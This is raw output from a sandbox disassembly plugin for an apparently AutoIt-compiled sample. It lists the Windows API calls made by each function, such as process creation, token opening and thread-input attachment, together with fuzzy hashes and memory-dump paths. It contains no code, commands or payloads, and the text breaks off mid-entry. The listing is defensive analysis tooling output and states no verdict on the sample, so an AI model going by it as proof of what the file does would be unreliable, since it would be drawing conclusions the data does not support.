                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 4127811313-0
                                                • Opcode ID: 91105a8e023ed1abdfaad7f1c25c90917eb8a1cbb0dc15c6c7f278feb3dd6c9d
                                                • Instruction ID: bbf0245d73cea310432dcf67e2c4d9d14d6c70853c2c9e59fa8ea6ba0fe0cea3
                                                • Opcode Fuzzy Hash: 91105a8e023ed1abdfaad7f1c25c90917eb8a1cbb0dc15c6c7f278feb3dd6c9d
                                                • Instruction Fuzzy Hash: 41114831910129BFCB20DF98CD458EE7BBDEB08304F500591F952E7141D7B4AA82CBB2
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00AE7352
                                                • MessageBoxW.USER32(?,?,?,?), ref: 00AE7385
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AE739B
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AE73A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 2880819207-0
                                                • Opcode ID: 440b0d4172c61676bfad936c9030b1f8dd64815fbd53d56ba04e31f6e7c97257
                                                • Instruction ID: 912d656a06d146100a93783bfce9424ef06ee19b2db6004e97773deb24c91f21
                                                • Opcode Fuzzy Hash: 440b0d4172c61676bfad936c9030b1f8dd64815fbd53d56ba04e31f6e7c97257
                                                • Instruction Fuzzy Hash: 881104B2A04245BFD7029FA8DC05E9E7BEDAB44311F144319F925D32A1DBB48D0187A0
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ABD1BA
                                                • GetStockObject.GDI32(00000011), ref: 00ABD1CE
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00ABD1D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CreateMessageObjectSendStockWindow
                                                • String ID:
                                                • API String ID: 3970641297-0
                                                • Opcode ID: 83065d0b0ec55f6ada2f93c6bc4c16e5dafe15aa8d44a083643cb15172ba16d9
                                                • Instruction ID: b1a39d386025fc2aa5c492d5cd170f9fd2ddc96a2bc18c14162db53d53de2f70
                                                • Opcode Fuzzy Hash: 83065d0b0ec55f6ada2f93c6bc4c16e5dafe15aa8d44a083643cb15172ba16d9
                                                • Instruction Fuzzy Hash: 1811D272101509BFEF124F98EC50EEABB6DFF08365F040211FA1552060DB35DC61EBA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                • Instruction ID: 162cc9de6d1e2eded941821017d7998033afe4fbd172df2514cdcb1b4e302f92
                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                • Instruction Fuzzy Hash: 2B01483240014EBBCF125F94DD558EE3F23BB1C350B588456FA2A59231DB36CAB2AB81
                                                APIs
                                                  • Part of subcall function 00AC7A0D: __getptd_noexit.LIBCMT ref: 00AC7A0E
                                                • __lock.LIBCMT ref: 00AC748F
                                                • InterlockedDecrement.KERNEL32(?), ref: 00AC74AC
                                                • _free.LIBCMT ref: 00AC74BF
                                                • InterlockedIncrement.KERNEL32(01317530), ref: 00AC74D7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 2704283638-0
                                                • Opcode ID: a247149bd0ad39572e65ec49f6319765927ddfbd88a6755a9917e076d3b87578
                                                • Instruction ID: c3661b00a12f529946637caceddf205223cfe66ef0a3a335242eac0915481c1b
                                                • Opcode Fuzzy Hash: a247149bd0ad39572e65ec49f6319765927ddfbd88a6755a9917e076d3b87578
                                                • Instruction Fuzzy Hash: 3201C03290A721ABC72AAF249B06F5DBBA0BF04715F16418DF824B7690CB345941CFC6
                                                APIs
                                                • __lock.LIBCMT ref: 00AC7AD8
                                                  • Part of subcall function 00AC7CF4: __mtinitlocknum.LIBCMT ref: 00AC7D06
                                                  • Part of subcall function 00AC7CF4: EnterCriticalSection.KERNEL32(00000000,?,00AC7ADD,0000000D), ref: 00AC7D1F
                                                • InterlockedIncrement.KERNEL32(?), ref: 00AC7AE5
                                                • __lock.LIBCMT ref: 00AC7AF9
                                                • ___addlocaleref.LIBCMT ref: 00AC7B17
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                • String ID:
                                                • API String ID: 1687444384-0
                                                • Opcode ID: 7c9194e9413f1c73218d2a734532d0bb3181d182ad7e94c6f40f14240a534988
                                                • Instruction ID: c2f29a25dcf878a46568f351921f8904cb3ad824bf4772e270283e83c8a5c1f1
                                                • Opcode Fuzzy Hash: 7c9194e9413f1c73218d2a734532d0bb3181d182ad7e94c6f40f14240a534988
                                                • Instruction Fuzzy Hash: 72016D72404B009FD720DF79DA05B4AB7F0EF40325F21894EA4AA972A0CF74AA44CF45
                                                APIs
                                                • _memset.LIBCMT ref: 00B0E33D
                                                • _memset.LIBCMT ref: 00B0E34C
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B63D00,00B63D44), ref: 00B0E37B
                                                • CloseHandle.KERNEL32 ref: 00B0E38D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _memset$CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3277943733-0
                                                • Opcode ID: 86e1edefd553aa83e2ef42e397a6875b7d2a16e9bea6ba103427f2bb2d881560
                                                • Instruction ID: 446bc3615623459e2a3064489c15748fa9a3c31cb7537216faea008d56d724b1
                                                • Opcode Fuzzy Hash: 86e1edefd553aa83e2ef42e397a6875b7d2a16e9bea6ba103427f2bb2d881560
                                                • Instruction Fuzzy Hash: E5F03AF2540304BAE6115B60AC45F777EDCDB04B54F014431FE09D71E2DBB99E0086A8
                                                APIs
                                                  • Part of subcall function 00ABAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00ABAFE3
                                                  • Part of subcall function 00ABAF83: SelectObject.GDI32(?,00000000), ref: 00ABAFF2
                                                  • Part of subcall function 00ABAF83: BeginPath.GDI32(?), ref: 00ABB009
                                                  • Part of subcall function 00ABAF83: SelectObject.GDI32(?,00000000), ref: 00ABB033
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B0EA8E
                                                • LineTo.GDI32(00000000,?,?), ref: 00B0EA9B
                                                • EndPath.GDI32(00000000), ref: 00B0EAAB
                                                • StrokePath.GDI32(00000000), ref: 00B0EAB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                • String ID:
                                                • API String ID: 1539411459-0
                                                • Opcode ID: 47df2a366a45a104dbda412819bb813819b4b571e80599d2b7bfc924bcf6158b
                                                • Instruction ID: 17f63537d681516634c4f81c48b2339f483c968772ba26b5f36cb71fb1f42c41
                                                • Opcode Fuzzy Hash: 47df2a366a45a104dbda412819bb813819b4b571e80599d2b7bfc924bcf6158b
                                                • Instruction Fuzzy Hash: F7F08231105259BBDB229FA4ED0DFCE3F59AF1A311F084101FA11620F1CBB89562CBA9
                                                APIs
                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ADC84A
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADC85D
                                                • GetCurrentThreadId.KERNEL32 ref: 00ADC864
                                                • AttachThreadInput.USER32(00000000), ref: 00ADC86B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                • String ID:
                                                • API String ID: 2710830443-0
                                                • Opcode ID: c0ca7a6f9c6c2b5979693a2b30f7a45e09baad06cf4264055fdff9a4ff323abd
                                                • Instruction ID: cf77cf8a17fc680c2ab3014fb416774ed8b526c99366e9d5591f114c4f33b88d
                                                • Opcode Fuzzy Hash: c0ca7a6f9c6c2b5979693a2b30f7a45e09baad06cf4264055fdff9a4ff323abd
                                                • Instruction Fuzzy Hash: 7AE0307154122476DB311F619C0DEDB7F1CEF057A1F408011B60995550CA718582D7E0
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 00ADB0D6
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,00ADAC9D), ref: 00ADB0DD
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00ADAC9D), ref: 00ADB0EA
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00ADAC9D), ref: 00ADB0F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CurrentOpenProcessThreadToken
                                                • String ID:
                                                • API String ID: 3974789173-0
                                                • Opcode ID: 2b7ce45dac82dd95d1f6f6bf19413853659d447a8456f6f4c9228c20f0b9d8d0
                                                • Instruction ID: 4f85a1f9b6df4813933d7bf5796e5bddff2f06b83e03520bd6a1329dd6ff7f70
                                                • Opcode Fuzzy Hash: 2b7ce45dac82dd95d1f6f6bf19413853659d447a8456f6f4c9228c20f0b9d8d0
                                                • Instruction Fuzzy Hash: 40E08632601211DBD7305FB29C0CF473BA8EF55792F128818F242D7050DF348442C761
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 00ABB496
                                                • SetTextColor.GDI32(?,000000FF), ref: 00ABB4A0
                                                • SetBkMode.GDI32(?,00000001), ref: 00ABB4B5
                                                • GetStockObject.GDI32(00000005), ref: 00ABB4BD
                                                • GetWindowDC.USER32(?,00000000), ref: 00B1DE2B
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B1DE38
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 00B1DE51
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 00B1DE6A
                                                • GetPixel.GDI32(00000000,?,?), ref: 00B1DE8A
                                                • ReleaseDC.USER32(?,00000000), ref: 00B1DE95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                • String ID:
                                                • API String ID: 1946975507-0
                                                • Opcode ID: 8dfd08ddbbfbeb2cb6c58bcbabf3fbae9939dc67b3a2da2de205dcd05fbbfa83
                                                • Instruction ID: 6bd59e8e566bc28320cfb0f299d086e687d534fb699502b491ad16a8a0c29f30
                                                • Opcode Fuzzy Hash: 8dfd08ddbbfbeb2cb6c58bcbabf3fbae9939dc67b3a2da2de205dcd05fbbfa83
                                                • Instruction Fuzzy Hash: A8E0ED31100240ABDF315B68AC0DBD83B51EB55336F14C666F669690E2CBB18592DB11
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 47a85a92ce4f85ee52bb50ef8c0af166e548baae988c7bf85a6ce5c182fee964
                                                • Instruction ID: 31065e88bd8dc01cdba289c1d4013eb52537f350c28e28b9c3eaf53aa1a5a7c6
                                                • Opcode Fuzzy Hash: 47a85a92ce4f85ee52bb50ef8c0af166e548baae988c7bf85a6ce5c182fee964
                                                • Instruction Fuzzy Hash: 32E092B1500204EFEB125F709C48AAE7BA9EB4C351F21881AF95A9B251DE7898429B50
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00ADB2DF
                                                • UnloadUserProfile.USERENV(?,?), ref: 00ADB2EB
                                                • CloseHandle.KERNEL32(?), ref: 00ADB2F4
                                                • CloseHandle.KERNEL32(?), ref: 00ADB2FC
                                                  • Part of subcall function 00ADAB24: GetProcessHeap.KERNEL32(00000000,?,00ADA848), ref: 00ADAB2B
                                                  • Part of subcall function 00ADAB24: HeapFree.KERNEL32(00000000), ref: 00ADAB32
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: 6f701c4e3d6fa96358d27a51d822645db2788082f23f77fd56f72d1dee5da3f5
                                                • Instruction ID: 9e885265f7f40e8c03a01457f669bfa64f5d678b4be8dc412470fbec5fdee4af
                                                • Opcode Fuzzy Hash: 6f701c4e3d6fa96358d27a51d822645db2788082f23f77fd56f72d1dee5da3f5
                                                • Instruction Fuzzy Hash: 39E0E636104005FFCB116F95DC08859FF76FF993213108622F61582571CF329872EB55
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 56c0d011f6ac015212cea76d51af7da0999e8185fcc7ac28b802f9ede2508bdd
                                                • Instruction ID: 6188d10b79b10715adddd70137127819fb20e94afc2f82a0a4c2b9bdc792e075
                                                • Opcode Fuzzy Hash: 56c0d011f6ac015212cea76d51af7da0999e8185fcc7ac28b802f9ede2508bdd
                                                • Instruction Fuzzy Hash: FFE0B6B1500204EFDB125F70DC4C66D7BA9FB4C351F11881AF95A9B261DF7999428B50
                                                APIs
                                                • OleSetContainedObject.OLE32(?,00000001), ref: 00ADDEAA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ContainedObject
                                                • String ID: AutoIt3GUI$Container
                                                • API String ID: 3565006973-3941886329
                                                • Opcode ID: e4ea7ff4d86a3adca5b0e29084b3b3ebfc71c31b01f6e18a2c8abe07c5ae6abd
                                                • Instruction ID: d17fc528f533b7bb775dea7ccf287f90a5d682a7070d4b1b94b3714fc93df142
                                                • Opcode Fuzzy Hash: e4ea7ff4d86a3adca5b0e29084b3b3ebfc71c31b01f6e18a2c8abe07c5ae6abd
                                                • Instruction Fuzzy Hash: 249116706006019FDB14DF64C884B6ABBF9AF49710F1485AEF94ACB391DB70E841CB60
                                                APIs
                                                  • Part of subcall function 00ABC6F4: _wcscpy.LIBCMT ref: 00ABC717
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                • __wcsnicmp.LIBCMT ref: 00AEDEFD
                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00AEDFC6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                • String ID: LPT
                                                • API String ID: 3222508074-1350329615
                                                • Opcode ID: ec17924b9f36764b6ce4a07179f715c4d369e33daa0f7d3186c261dd4065b908
                                                • Instruction ID: e7f01ef92251e92946d7d57871e6c148cc3c5acb8418fc7b55b2c34239065086
                                                • Opcode Fuzzy Hash: ec17924b9f36764b6ce4a07179f715c4d369e33daa0f7d3186c261dd4065b908
                                                • Instruction Fuzzy Hash: D1618F75A00215AFCB14EF99C995EEEB7F8FF09710F05406AF546AB291DB70AE40CB90
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00ABBCDA
                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00ABBCF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: ce62a668de4e0f1ced177b0a976acea97f980fc027f8f244027635c7458bd5e7
                                                • Instruction ID: 4bc0f285c7e3c98722d605d00ee078f4a594fdebd9ea40afe0d2783514e30962
                                                • Opcode Fuzzy Hash: ce62a668de4e0f1ced177b0a976acea97f980fc027f8f244027635c7458bd5e7
                                                • Instruction Fuzzy Hash: 8B5124714087489BE320AF14DC86BAFBBECFF99354F41484EF1C8420A6EF7085A98756
                                                APIs
                                                  • Part of subcall function 00AA44ED: __fread_nolock.LIBCMT ref: 00AA450B
                                                • _wcscmp.LIBCMT ref: 00AEC65D
                                                • _wcscmp.LIBCMT ref: 00AEC670
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
